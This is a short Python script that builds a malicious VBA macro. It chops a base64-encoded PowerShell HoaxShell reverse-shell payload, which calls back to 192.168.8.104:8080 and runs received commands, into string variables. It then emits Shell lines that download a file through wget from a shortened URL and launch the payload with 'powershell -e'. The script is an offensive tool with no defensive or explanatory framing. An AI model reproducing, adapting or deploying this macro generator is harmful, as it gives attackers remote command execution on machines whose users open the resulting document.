p = ['a', 'bb', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'AA', 'B']

# copy the hoadshell payload and paste it here
x= 'JABzAD0AJwAxADkAMgAuADEANgA4AC4AOAAuADEAMAA0ADoAOAAwADgAMAAnADsAJABpAD0AJwBiAGUAMgA0ADQAYwBhADkALQA0ADUAYQAxAGUAYQBjAGMALQBhADMAYwBlAGYAZAAwADYAJwA7ACQAcAA9ACcAaAB0AHQAcAA6AC8ALwAnADsAJAB2AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AYgBlADIANAA0AGMAYQA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADUAMQAxADMALQAyADYAMQBkACIAPQAkAGkAfQA7AHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewAkAGMAPQAoAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvADQANQBhADEAZQBhAGMAYwAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQA1ADEAMQAzAC0AMgA2ADEAZAAiAD0AJABpAH0AKQAuAEMAbwBuAHQAZQBuAHQAOwBpAGYAIAAoACQAYwAgAC0AbgBlACAAJwBrAG8AawBvACcAKQAgAHsAJAByAD0AaQBlAHgAIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB0AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcAAkAHMALwBhADMAYwBlAGYAZAAwADYAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQA1ADEAMQAzAC0AMgA2ADEAZAAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0A'
for i in p:
    print('    Dim ',i,'As String')

print('    Dim payload As String')
print('    Dim Code As String')

j=0
for i in range(0,len(x),50):
    print('    '+p[j],'="' + x[i:i+50]+'"')
    j+=1

print('    Shell ("calc.exe")')
print('    Shell ("powershell -command ""wget https://tinyurl.com/mr4x6csv -OutFile c:\\temp\\aaa.png""")')
print("    payload = ", ' & '.join(p))
print('    Code = "powershell -e """ & payload')
print('    Shell(Code,1)')
